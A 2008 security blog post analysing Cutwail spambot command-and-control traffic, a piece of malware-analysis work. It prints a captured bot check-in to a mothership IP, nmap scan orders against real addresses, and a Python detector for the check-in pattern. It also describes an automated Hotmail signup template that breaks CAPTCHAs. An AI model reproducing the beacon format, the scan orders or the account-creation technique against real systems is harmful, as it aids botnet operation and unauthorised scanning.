A little Cutwail spambot analysis on network traffic
September 24th, 2008 — bjou

Recently, while analyzing the network traffic of a Cutwail binary (a spambot commonly installed by a trojan of the Pushdo family), I found some interesting behavior in its command-and-control communication. Although I expected encrypted HTTP communication on port 4080, as stated in the recent research on the TOP Spam Botnets from April 2008, I found a completely different setup. First, there were over a dozen backend nodes (motherships), all in the 216.195.[52-63] range. Analyzing the binary revealed more hard-coded IP addresses in Russia and the US.
Moreover, the traffic was not completely encrypted, and none of it was on port 4080/tcp. Ports in use were 7230/tcp (encrypted), 8195/tcp (encrypted), 8001/tcp (plain), 3078 (plain) and 3128 (plain, with a base64-encoded HTTP payload that represents IP addresses in decimal, for whatever reason; see below). Again, the data shown is not sanitized or censored in any way.
POST / HTTP/1.1
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Pragma: no-cache
Accept-Charset: iso-8859-1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 216.195.55.10:3128
Content-Length: 85
Connection: Keep-Alive
data=5NIkrmdE9mkmNhBBD+yxLNZAUjtwQNC0uO4Gxf17PH6RUuBFmKfWGzYC6IecvQ3INDLDOEaJlyr37hwE
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Cache-Control: no-cache
Date: Fri, 29 Aug 2008 19:23:32 GMT
Last-Modified: Fri, 29 Aug 2008 19:23:32 GMT
Server: Apache/1.3.35 (Unix) PHP/4.4.2
Content-Length: 110
{NTQx9k+dqZV6afQgf2ABxEjDK5OPtU2/XPa8nj4GndeDqESDAmD0XeGBu1SS7ux0pL9vTIIFzqeYtyMXbJQMOZxHIz2ZaBBWFnttDXrlUcp=}.
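The check-in above is easy to spot on the wire precisely because it is plain: a POST to "/" against a bare IP literal on a non-standard port, carrying a "data=<base64>" body. As an added illustration (not code from the original post), the following Python classifier scores a raw HTTP request against those traits; the mothership range and port set come from the text above, while the sample requests and their threshold of three hits are constructed for this example.

```python
import re
import ipaddress
# From the capture above: motherships in 216.195.[52-63].x (two CIDR blocks,
# as 52-63 is not a single power-of-two range) and the observed C&C ports.
MOTHERSHIP_NETS = [ipaddress.ip_network("216.195.52.0/22"),
                   ipaddress.ip_network("216.195.56.0/21")]
CC_PORTS = {7230, 8195, 8001, 3078, 3128}
BODY_RE = re.compile(r"^data=[A-Za-z0-9+/]+={0,2}$")  # "data=<base64>" body

# Constructed samples modelled on the capture above; the base64 body is
# filler (it encodes "ABCDEFGHIJKLMNOPQRST"), not a real payload.
SAMPLE_CHECKIN = ("POST / HTTP/1.1\r\n"
                  "Host: 216.195.55.10:3128\r\nContent-Length: 33\r\n\r\n"
                  "data=QUJDREVGR0hJSktMTU5PUFFSU1Q=")
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

def parse_request(raw):
    # Split a raw HTTP request into (method, path, headers, body).
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def checkin_indicators(raw):
    """Names of the Cutwail check-in traits present in one request."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and path == "/":
        hits.append("post_root")
    host, _, port = headers.get("host", "").rpartition(":")
    if not host:                  # no port given: Host was the bare value
        host, port = port, "80"
    try:
        addr = ipaddress.ip_address(host)
        hits.append("bare_ip_host")   # bots contacted raw IPs, not hostnames
        if any(addr in net for net in MOTHERSHIP_NETS):
            hits.append("mothership_range")
    except ValueError:
        pass                          # Host was a hostname, not an IP literal
    if port.isdigit() and int(port) in CC_PORTS:
        hits.append("cc_port")
    if BODY_RE.match(body):
        hits.append("base64_data_body")
    return hits

def is_cutwail_checkin(raw):
    # Flag on the mothership range alone, or on three weaker traits together.
    hits = checkin_indicators(raw)
    return "mothership_range" in hits or len(hits) >= 3
```

The weaker traits (bare IP host, C&C port, base64 body) are kept separate from the range match so the rule still fires if the operators move the motherships to fresh address space.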
Moreover, I found that the bots tried to automatically create Hotmail accounts using an XML template that had been provided by a mothership beforehand. I uploaded the template for the interested reader. This template is a guide through the Hotmail signup form, apparently also able to break CAPTCHAs. Furthermore, one bot additionally downloaded nmap and received instructions from a mothership containing nmap options and IP addresses.
.{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80.
Option -sV: Probe open ports to determine service/version info
Option -T5: Set timing template (higher is faster) <- 5 is the highest
As can be seen, control in the botnet's background is done via pretty diverse channels. Of course, one major task of the bot is still spamming; this short analysis, however, concentrated on its C&C, using binaries from July/August 2008. Note that this study might not be up to date any more by now…